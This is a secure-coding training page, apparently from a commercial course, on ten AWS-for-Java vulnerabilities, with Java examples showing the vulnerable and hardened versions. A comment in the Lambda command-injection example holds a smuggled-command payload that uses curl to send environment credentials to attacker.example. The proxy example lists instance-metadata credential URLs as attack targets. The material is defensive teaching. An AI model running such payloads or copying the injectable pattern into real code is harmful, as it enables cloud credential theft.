Top 10 Vulnerabilities: AWS for Java

Get Trained and Stay Ahead of Cybersecurity Threats with Our Vast Library of Application Security Training Content.

Dangerous Dependencies

In modern applications, developers pull in third-party packages and framework libraries from many sources, both commercial and open source. Keeping these components current is a constant challenge, particularly once security issues are reported against them: a library with a published vulnerability is exploitable in every application that ships it, whether or not that application's own code is sound. Left unaddressed, outdated dependencies widen the attack surface of your web application.

Insecure S3 POST upload policy

AWS supports browser-based, HTML form (HTTP POST) uploads directly to S3. The developer builds a form that carries the request details together with a signed POST policy: a document listing the bucket, a constraint on the object key, an expiration time and any other conditions every upload must satisfy, signed with the application's AWS credentials so that S3 can verify it. That policy is the only thing standing between the browser and the bucket. If it is too permissive (for instance a starts-with condition on $key with an empty prefix, no content-length-range, or no condition covering the acl or Content-Type fields), an attacker can reuse the signed form to upload arbitrary files anywhere in the bucket, or overwrite existing objects with malicious content.
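The following is an added example, not code from the course or from AWS: a plain-Java (17+, no SDK) generator for the hidden form fields of an S3 POST upload, showing a tightly conditioned policy beside the loose one described above. The bucket name, tenant prefix, size limit and the IAM key pair are constructed placeholders (the key pair is AWS's documented example pair, not a real credential). The SigV4 signing-key derivation and the requirement that every form field be covered by a policy condition are taken from the S3 POST policy documentation.

```java
import java.nio.charset.StandardCharsets;
import java.time.Instant;
import java.time.ZoneOffset;
import java.time.format.DateTimeFormatter;
import java.util.ArrayList;
import java.util.Base64;
import java.util.HexFormat;
import java.util.List;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class PostPolicy {

    static final DateTimeFormatter AMZ_DATE =
        DateTimeFormatter.ofPattern("yyyyMMdd'T'HHmmss'Z'").withZone(ZoneOffset.UTC);
    static final DateTimeFormatter ISO_EXPIRY =
        DateTimeFormatter.ofPattern("yyyy-MM-dd'T'HH:mm:ss'Z'").withZone(ZoneOffset.UTC);

    /** Builds the policy document; weak=true reproduces the misconfiguration. */
    static String policyJson(String bucket, String prefix, String credential,
                             String amzDate, Instant expires, boolean weak) {
        List<String> conditions = new ArrayList<>();
        conditions.add("{\"bucket\": \"" + bucket + "\"}");
        if (weak) {
            // Empty prefix: the holder of this form can write ANY key, so any
            // existing object in the bucket can be overwritten.
            conditions.add("[\"starts-with\", \"$key\", \"\"]");
        } else {
            conditions.add("[\"starts-with\", \"$key\", \"" + prefix + "\"]"); // confined to caller's prefix
            conditions.add("{\"acl\": \"private\"}");                            // browser cannot send acl=public-read
            conditions.add("[\"starts-with\", \"$Content-Type\", \"image/\"]"); // no text/html uploads
            conditions.add("[\"content-length-range\", 1, 5242880]");           // 1 byte .. 5 MiB
        }
        // SigV4 bookkeeping fields; S3 rejects any form field not covered by a condition.
        conditions.add("{\"x-amz-algorithm\": \"AWS4-HMAC-SHA256\"}");
        conditions.add("{\"x-amz-credential\": \"" + credential + "\"}");
        conditions.add("{\"x-amz-date\": \"" + amzDate + "\"}");
        return "{\"expiration\": \"" + ISO_EXPIRY.format(expires) + "\", \"conditions\": ["
             + String.join(",", conditions) + "]}";
    }

    static byte[] hmac(byte[] key, String data) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(data.getBytes(StandardCharsets.UTF_8));
    }

    /** SigV4 signing-key chain, then the signature over the base64 policy. */
    static String sign(String secretKey, String date, String region, String base64Policy) throws Exception {
        byte[] kDate = hmac(("AWS4" + secretKey).getBytes(StandardCharsets.UTF_8), date);
        byte[] kRegion = hmac(kDate, region);
        byte[] kService = hmac(kRegion, "s3");
        byte[] kSigning = hmac(kService, "aws4_request");
        return HexFormat.of().formatHex(hmac(kSigning, base64Policy));
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: AWS's documented example key pair, never a real one.
        String accessKey = "AKIAIOSFODNN7EXAMPLE";
        String secretKey = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY";
        String bucket = "example-uploads", region = "us-east-1";

        Instant now = Instant.now();
        String amzDate = AMZ_DATE.format(now);
        String date = amzDate.substring(0, 8);
        String credential = accessKey + "/" + date + "/" + region + "/s3/aws4_request";

        String policy = policyJson(bucket, "uploads/user-123/", credential, amzDate, now.plusSeconds(300), false);
        String b64 = Base64.getEncoder().encodeToString(policy.getBytes(StandardCharsets.UTF_8));

        // These become hidden <input> fields next to the <input type="file"> element.
        System.out.println("policy=" + b64);
        System.out.println("x-amz-algorithm=AWS4-HMAC-SHA256");
        System.out.println("x-amz-credential=" + credential);
        System.out.println("x-amz-date=" + amzDate);
        System.out.println("x-amz-signature=" + sign(secretKey, date, region, b64));
    }
}
```

Because S3 refuses a form field that no condition mentions, the hardened policy above also means the browser cannot quietly add acl=public-read or a text/html Content-Type. Review the weak variant against a real form: a starts-with condition on $key with an empty prefix plus a long expiration is effectively a bucket-wide write credential for as long as the form is reachable.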

Lambda Command Injection

Code injection is a general class of attack in which attacker-supplied data is interpreted or executed as code by the application, usually because input validation is missing or insufficient. Command injection is the specific case where the injected data reaches an operating system shell, which often lets the attacker compromise the whole application, take full control of the server and pivot to other systems in the organization. In a Lambda function this is especially damaging: the process environment holds the temporary credentials of the function's execution role, so a single injected command can exfiltrate them and let the attacker act as the function against every AWS resource it can reach.
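An added example, not code from the course: a Java Lambda handler that runs an external conversion tool on an uploaded file, with the injectable version beside the hardened one. The tool path, the input directory and the event shape are hypothetical; the only library dependency is aws-lambda-java-core for the handler interface.

```java
import com.amazonaws.services.lambda.runtime.Context;
import com.amazonaws.services.lambda.runtime.RequestHandler;

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class ConvertHandler implements RequestHandler<Map<String, String>, String> {

    // Hypothetical tool and staging directory; adjust for a real deployment.
    private static final String TOOL = "/opt/bin/convert";
    private static final String INPUT_DIR = "/tmp/uploads/";
    // Allow-list: a short alphanumeric base name and one of two extensions.
    private static final Pattern SAFE_NAME = Pattern.compile("^[A-Za-z0-9_-]{1,64}\\.(png|jpg)$");

    @Override
    public String handleRequest(Map<String, String> event, Context context) {
        String fileName = event.get("fileName");   // attacker-controlled
        try {
            return convertSafely(fileName);
        } catch (IOException | InterruptedException e) {
            return "conversion failed: " + e.getMessage();
        }
    }

    // VULNERABLE: the file name is spliced into a shell command line, so
    //   fileName = "x.png; curl -d \"$(env)\" https://attacker.example/"
    // runs arbitrary commands and leaks AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
    // and AWS_SESSION_TOKEN of the execution role from the environment.
    static String convertUnsafely(String fileName) throws IOException, InterruptedException {
        String cmd = TOOL + " " + INPUT_DIR + fileName + " -resize 50% " + INPUT_DIR + "out.png";
        Process p = new ProcessBuilder("/bin/sh", "-c", cmd).redirectErrorStream(true).start();
        return readAll(p);
    }

    // HARDENED: validate against the allow-list, then pass every argument as its
    // own array element so no shell ever interprets the input. The directory is
    // prepended, so a name cannot start with "-" and be read as a tool option.
    static String convertSafely(String fileName) throws IOException, InterruptedException {
        if (fileName == null || !SAFE_NAME.matcher(fileName).matches()) {
            throw new IOException("rejected file name");
        }
        List<String> argv = List.of(TOOL, INPUT_DIR + fileName, "-resize", "50%", INPUT_DIR + "out.png");
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        return readAll(p);
    }

    private static String readAll(Process p) throws IOException, InterruptedException {
        String out = new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        p.waitFor();
        return out;
    }
}
```

The argument-array form of ProcessBuilder is necessary but not sufficient: it stops shell metacharacters, while the allow-list stops option injection into the tool itself. Prefer a library call over an external process wherever one exists, and give the function's execution role only the permissions the conversion needs, so that a leak of its credentials is bounded.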

Lambda XML Entity Injection

XML External Entity (XXE) injection targets any application that parses XML it does not fully control, such as a Lambda that accepts XML request bodies, SOAP messages or uploaded documents. By supplying a document with a crafted DOCTYPE, an attacker exploits dangerous features that standard XML libraries enable by default, above all the resolution of external entities, to read files from the execution environment (including /proc/self/environ, which holds the function's role credentials), to make the function issue requests to backend systems it can reach, or to exhaust memory with recursively defined entities.

Leftover Debug Code

Leftover debug comments or code can give attackers entry points through functionality that was built for debugging or testing and was never meant to ship, such as test-only request parameters, hidden handlers or verbose error output. Forgetting to remove these back doors creates serious risk, since they typically bypass authentication or access control.

Misconfigured AWS Cognito Attributes

With Amazon Cognito user pools, developers can quickly add authentication workflows: sign-up and sign-in, password changes for authenticated users and forgotten-password flows for unauthenticated users. In its default state, however, a user pool lets signed-in users update their own profile attributes, and an app client created with default settings can typically write most of them. If the application reads one of those attributes (a custom role or tenant field, for example) to make authorization decisions, a user can rewrite it through the UpdateUserAttributes API and escalate their privileges; only values the user cannot change, such as Cognito group membership, should carry authorization meaning.

Misconfigured AWS Cognito profile allows self-registration

Amazon Cognito is Amazon Web Services' managed, scalable sign-up/sign-in service for application developers. Certain options, if enabled, let outsiders reach features that lead to unauthorized access. The most common is open self-registration: unless the pool is configured so that only administrators can create users, anyone who learns the app client ID can call the unauthenticated SignUp API, confirm the account and obtain valid tokens for an application that assumed every account was provisioned by the business.
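An added example covering both Cognito items above (self-registration and user-writable attributes), not code from the course: a small audit using the AWS SDK for Java v2 Cognito Identity Provider client. The list of attribute names that an application is assumed to use for authorization is a constructed placeholder; treating an absent write-attribute list as "everything writable" is a deliberately conservative assumption of this check, not a statement of Cognito's behaviour.

```java
import software.amazon.awssdk.services.cognitoidentityprovider.CognitoIdentityProviderClient;
import software.amazon.awssdk.services.cognitoidentityprovider.model.DescribeUserPoolClientRequest;
import software.amazon.awssdk.services.cognitoidentityprovider.model.DescribeUserPoolRequest;
import software.amazon.awssdk.services.cognitoidentityprovider.model.SchemaAttributeType;
import software.amazon.awssdk.services.cognitoidentityprovider.model.UserPoolClientType;
import software.amazon.awssdk.services.cognitoidentityprovider.model.UserPoolType;

import java.util.ArrayList;
import java.util.List;

public class CognitoAudit {

    // Hypothetical: attributes the application under review reads for authorization.
    static final List<String> AUTHZ_ATTRIBUTES = List.of("custom:role", "custom:isAdmin", "custom:tenant");

    static List<String> audit(UserPoolType pool, UserPoolClientType client) {
        List<String> findings = new ArrayList<>();

        // 1. Self-registration: unless AllowAdminCreateUserOnly is true, anyone who
        //    knows the client id can call SignUp and create their own account.
        boolean adminOnly = pool.adminCreateUserConfig() != null
                && Boolean.TRUE.equals(pool.adminCreateUserConfig().allowAdminCreateUserOnly());
        if (!adminOnly) {
            findings.add("SignUp is open: AllowAdminCreateUserOnly is not set on the pool");
        }

        // 2. Writable attributes: if an attribute is mutable, not developer-only, and
        //    the app client may write it, the user can change it with UpdateUserAttributes
        //    after logging in. Such an attribute must never drive authorization.
        List<String> writable = client.writeAttributes();
        boolean writeListKnown = writable != null && !writable.isEmpty();
        for (SchemaAttributeType attr : pool.schemaAttributes()) {
            boolean mutable = Boolean.TRUE.equals(attr.mutable())
                    && !Boolean.TRUE.equals(attr.developerOnlyAttribute());
            // Assumption (conservative): no explicit write list => treat as writable.
            boolean clientCanWrite = !writeListKnown || writable.contains(attr.name());
            if (mutable && clientCanWrite && AUTHZ_ATTRIBUTES.contains(attr.name())) {
                findings.add("user-writable attribute used for authorization: " + attr.name()
                        + " (use a Cognito group or a developer-only attribute instead)");
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        String poolId = args[0];    // e.g. us-east-1_AbCdEfGhI (placeholder)
        String clientId = args[1];  // the app client the front end uses (placeholder)
        try (CognitoIdentityProviderClient cognito = CognitoIdentityProviderClient.create()) {
            UserPoolType pool = cognito.describeUserPool(
                    DescribeUserPoolRequest.builder().userPoolId(poolId).build()).userPool();
            UserPoolClientType client = cognito.describeUserPoolClient(
                    DescribeUserPoolClientRequest.builder().userPoolId(poolId).clientId(clientId).build())
                    .userPoolClient();
            List<String> findings = audit(pool, client);
            if (findings.isEmpty()) {
                System.out.println("no findings");
            }
            findings.forEach(f -> System.out.println("FINDING: " + f));
        }
    }
}
```

Run it with credentials that hold cognito-idp:DescribeUserPool and cognito-idp:DescribeUserPoolClient. The fix for the first finding is the pool's "Only allow administrators to create users" setting; the fix for the second is to move the authorization signal to group membership (exposed in the cognito:groups token claim) or to a developer-only attribute, and to remove it from the client's writable attributes.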

Misconfigured Reverse Proxy

In cloud-native software, reverse proxies commonly sit in front of backend services, forwarding requests to them or to resources that corporate firewalls otherwise shield from external access. A misconfigured proxy is a particular threat in the cloud, because an adversary who can steer where it forwards (an open forwarding target, an unvalidated Host header or path, or a followed redirect to an internal address) can query sensitive endpoints, above all the EC2 instance metadata service at 169.254.169.254, which hands out the instance role's temporary credentials. Requiring IMDSv2 (HttpTokens set to required, with a PUT response hop limit of 1) blocks the simplest of these requests, because a proxied GET carries no session token; validating the forwarding target is still necessary.
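An added example, not the course's code: the target-validation step a Java reverse proxy should run before forwarding. The allow-listed backend host names are hypothetical; the metadata addresses are the documented IMDS endpoints. The policy check is pure and runs offline; the resolution check needs DNS.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.List;
import java.util.Set;

public class UpstreamGuard {

    // Hypothetical allow-list of backends this proxy may reach.
    static final Set<String> ALLOWED_HOSTS =
        Set.of("api.internal.example.com", "reports.internal.example.com");

    // IMDS IPv6 endpoint; the IPv4 one (169.254.169.254) is link-local and caught below.
    static final InetAddress IMDS_V6;
    static {
        try {
            IMDS_V6 = InetAddress.getByName("fd00:ec2::254");   // literal, no DNS lookup
        } catch (UnknownHostException e) {
            throw new ExceptionInInitializerError(e);
        }
    }

    /** Pure policy check on the requested target; no network access. */
    static boolean targetPermitted(String target) {
        URI uri;
        try {
            uri = new URI(target);
        } catch (URISyntaxException e) {
            return false;
        }
        String host = uri.getHost();
        // Reject anything without a host name, non-https schemes and "user@host" tricks.
        if (host == null || !"https".equals(uri.getScheme()) || uri.getUserInfo() != null) {
            return false;
        }
        return ALLOWED_HOSTS.contains(host.toLowerCase());
    }

    /** Resolve an allow-listed name and refuse if any answer points inside the instance. */
    static boolean resolvesSafely(String host) {
        try {
            for (InetAddress a : InetAddress.getAllByName(host)) {
                if (a.isLinkLocalAddress() || a.isLoopbackAddress()
                        || a.isAnyLocalAddress() || a.equals(IMDS_V6)) {
                    return false;   // 169.254.0.0/16, fe80::/10, 127/8, ::1, 0.0.0.0, fd00:ec2::254
                }
            }
            return true;
        } catch (UnknownHostException e) {
            return false;
        }
    }

    static boolean mayForward(String target) {
        return targetPermitted(target) && resolvesSafely(URI.create(target).getHost());
    }

    public static void main(String[] args) {
        // Constructed targets an attacker might request through an open proxy.
        List<String> requested = List.of(
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "https://[fd00:ec2::254]/latest/api/token",
            "https://api.internal.example.com@169.254.169.254/",
            "https://api.internal.example.com/v1/orders");
        for (String t : requested) {
            System.out.println((targetPermitted(t) ? "policy ok   " : "policy deny ") + t);
        }
    }
}
```

Resolving and then connecting by name leaves a DNS-rebinding window; a proxy that takes this seriously connects to the address it just validated rather than letting the HTTP client resolve the name again. Keep IMDSv2 enforced on the instance regardless, so that a check bypassed in one service does not hand over the role credentials.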

S3 Bucket Authenticated Users 'WRITE' Access

Granting WRITE access to the AuthenticatedUsers group on an S3 bucket ACL lets anyone who holds any AWS account, not just users of your application, upload, modify and delete objects in the bucket. This overly permissive ACL can lead to data loss, and it gives attackers unrestricted ability to add, replace and delete objects (PutObject and DeleteObject), for instance to plant malicious content that your application or its users later download.

S3 Bucket Public 'READ' Access

Granting public READ access on a bucket ACL lets unauthenticated users list the objects in the bucket and use that listing to go after your data. Bucket-level READ corresponds to ListBucket rather than to reading object contents, but a listing tells an attacker every key name, so they can probe each object for its own misconfigured ACL and download the ones that are exposed.
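An added example covering both S3 ACL items above, not code from the course: an AWS SDK for Java v2 check that reads a bucket's ACL, flags grants to the AllUsers and AuthenticatedUsers groups by the access they confer, and reports whether the bucket's Block Public Access settings neutralise them. The grantee group URIs and the permission meanings are AWS's; the output wording is mine.

```java
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.GetBucketAclRequest;
import software.amazon.awssdk.services.s3.model.GetPublicAccessBlockRequest;
import software.amazon.awssdk.services.s3.model.Grant;
import software.amazon.awssdk.services.s3.model.Permission;
import software.amazon.awssdk.services.s3.model.PublicAccessBlockConfiguration;
import software.amazon.awssdk.services.s3.model.S3Exception;

import java.util.ArrayList;
import java.util.List;

public class BucketAclAudit {

    static final String ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers";
    static final String AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers";

    /** Translate group grants into what an outsider can actually do with the bucket. */
    static List<String> findings(List<Grant> grants) {
        List<String> out = new ArrayList<>();
        for (Grant g : grants) {
            String uri = g.grantee() == null ? null : g.grantee().uri();
            if (uri == null) {
                continue;   // canonical-user grants (the owner, specific accounts) are not in scope here
            }
            String who;
            if (ALL_USERS.equals(uri)) {
                who = "anyone on the internet (AllUsers)";
            } else if (AUTHENTICATED_USERS.equals(uri)) {
                who = "any AWS account holder (AuthenticatedUsers)";
            } else {
                continue;
            }
            Permission p = g.permission();
            if (p == Permission.READ || p == Permission.FULL_CONTROL) {
                out.add(who + " can list every object key (ListBucket)");
            }
            if (p == Permission.WRITE || p == Permission.FULL_CONTROL) {
                out.add(who + " can create, overwrite and delete objects (PutObject/DeleteObject)");
            }
            if (p == Permission.WRITE_ACP || p == Permission.FULL_CONTROL) {
                out.add(who + " can rewrite the bucket ACL and grant themselves more");
            }
        }
        return out;
    }

    /** With both flags on, S3 ignores existing public ACLs and refuses new ones. */
    static boolean publicAclsNeutralised(PublicAccessBlockConfiguration c) {
        return Boolean.TRUE.equals(c.blockPublicAcls()) && Boolean.TRUE.equals(c.ignorePublicAcls());
    }

    public static void main(String[] args) {
        String bucket = args[0];
        try (S3Client s3 = S3Client.create()) {
            List<Grant> grants = s3.getBucketAcl(GetBucketAclRequest.builder().bucket(bucket).build()).grants();
            List<String> findings = findings(grants);
            findings.forEach(f -> System.out.println("FINDING: " + f));
            if (findings.isEmpty()) {
                System.out.println("no group grants on the bucket ACL");
                return;
            }
            try {
                PublicAccessBlockConfiguration pab = s3.getPublicAccessBlock(
                        GetPublicAccessBlockRequest.builder().bucket(bucket).build())
                        .publicAccessBlockConfiguration();
                System.out.println(publicAclsNeutralised(pab)
                        ? "Block Public Access is ignoring these grants; still remove them"
                        : "Block Public Access does NOT neutralise these grants");
            } catch (S3Exception e) {
                // NoSuchPublicAccessBlockConfiguration: nothing at bucket level; check the account setting.
                System.out.println("no bucket-level Block Public Access (" + e.awsErrorDetails().errorCode() + ")");
            }
        }
    }
}
```

Object ACLs can differ from the bucket ACL, so a clean bucket ACL does not prove that individual objects are private; the cleanest fix is to set the bucket's Object Ownership to BucketOwnerEnforced, which disables ACLs entirely and leaves bucket policies and IAM as the only access path.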

S3 Directory Traversal

Directory traversal is an attack that gains unauthorized access to restricted directories and files. It exploits the way a vulnerable web application constructs file paths when serving assets, using sequences such as ../ to move through the directory structure of the server. When the application keeps its assets in S3 and builds the object key from user input, the same flaw lets an attacker reach keys outside the intended prefix, such as another tenant's objects, or, where the application copies objects to local disk before serving them, the server's own files. Either way the attacker may read sensitive configuration, obtain credentials for backend systems, and gather enough information to take control of the server.
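An added example, not the course's code: a key resolver that maps a user-supplied relative path onto an S3 key under a per-tenant prefix and refuses anything that could escape it, with a hypothetical download helper using the AWS SDK for Java v2. The prefix, bucket and sample inputs are constructed.

```java
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.GetObjectRequest;

import java.util.List;
import java.util.regex.Pattern;

public class S3KeyResolver {

    // One path segment: must start with a letter, digit, "_" or "-", so "", ".",
    // ".." and dot-files fail; "%" is excluded so an encoded "../" that survived
    // the framework's decoding ("%2e%2e%2f") fails as well.
    private static final Pattern SEGMENT = Pattern.compile("[A-Za-z0-9_-][A-Za-z0-9._-]{0,127}");

    /** Returns tenantPrefix + userPath, or throws if userPath is not a clean relative path. */
    static String resolveKey(String tenantPrefix, String userPath) {
        if (userPath == null || userPath.contains("\0")) {
            throw new IllegalArgumentException("malformed path");
        }
        String path = userPath.replace('\\', '/');   // treat Windows separators as separators
        if (path.startsWith("/")) {
            throw new IllegalArgumentException("absolute paths are not allowed");
        }
        for (String segment : path.split("/", -1)) {
            if (!SEGMENT.matcher(segment).matches()) {
                throw new IllegalArgumentException("rejected path segment: \"" + segment + "\"");
            }
        }
        return tenantPrefix + path;
    }

    /** Hypothetical use: fetch the object only after the key has been resolved safely. */
    static byte[] download(S3Client s3, String bucket, String tenantPrefix, String userPath) {
        String key = resolveKey(tenantPrefix, userPath);
        return s3.getObjectAsBytes(GetObjectRequest.builder().bucket(bucket).key(key).build()).asByteArray();
    }

    public static void main(String[] args) {
        String prefix = "tenants/acme/";   // constructed per-tenant prefix
        List<String> inputs = List.of(
            "reports/q1-2024.pdf",                 // accepted
            "../globex/reports/q1-2024.pdf",       // another tenant's key
            "reports/..\\..\\secrets.txt",         // backslash variant
            "%2e%2e/secrets.txt",                  // encoded variant
            "/etc/passwd");                        // absolute path
        for (String input : inputs) {
            try {
                System.out.println(input + " -> " + resolveKey(prefix, input));
            } catch (IllegalArgumentException e) {
                System.out.println(input + " -> REJECTED (" + e.getMessage() + ")");
            }
        }
    }
}
```

The allow-list approach is deliberately stricter than normalising the path: Paths.get("/", input).normalize() would silently turn "../../etc/passwd" into "etc/passwd" and serve something, whereas a request containing ".." is an attack signal worth rejecting and logging. If the application copies objects to local disk, apply the same resolver before constructing the local file path.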

Subdomain Takeover

A subdomain takeover occurs when an attacker gains control of a subdomain of a target domain. Typically the subdomain has a canonical name (CNAME) record in DNS pointing at an external host, such as an S3 static website endpoint or a CloudFront distribution, but nothing is provisioned at that host: either the resource has not been created yet, or it was deleted while the DNS record stayed behind. An attacker claims the same resource name on the provider, and the dangling record now serves their content under your domain, with your cookies and your users' trust.

Ready to get started?

Experience the full Kontra platform and see what it can do for you and your team.

Get Your Free Trial

Download Syllabus

Let’s Talk

Apprenticeship Program

Access our Free OWASP Top 10 for Web

Enter your information below to join our referral program and gain FREE access for 14 days

Follow the steps below to get FREE access to our OWASP top 10 for Web course for 14 days

  1. Simply copy the LinkedIn message below
  2. Post the message on your LinkedIn profile
  3. We will contact you as soon as possible on LinkedIn and send you an invite to access our OWASP Top 10 for Web course


Make sure you confirm the tag @ThriveDX Enterprise after pasting the text below into your LinkedIn post, to avoid delays in getting access to the course.
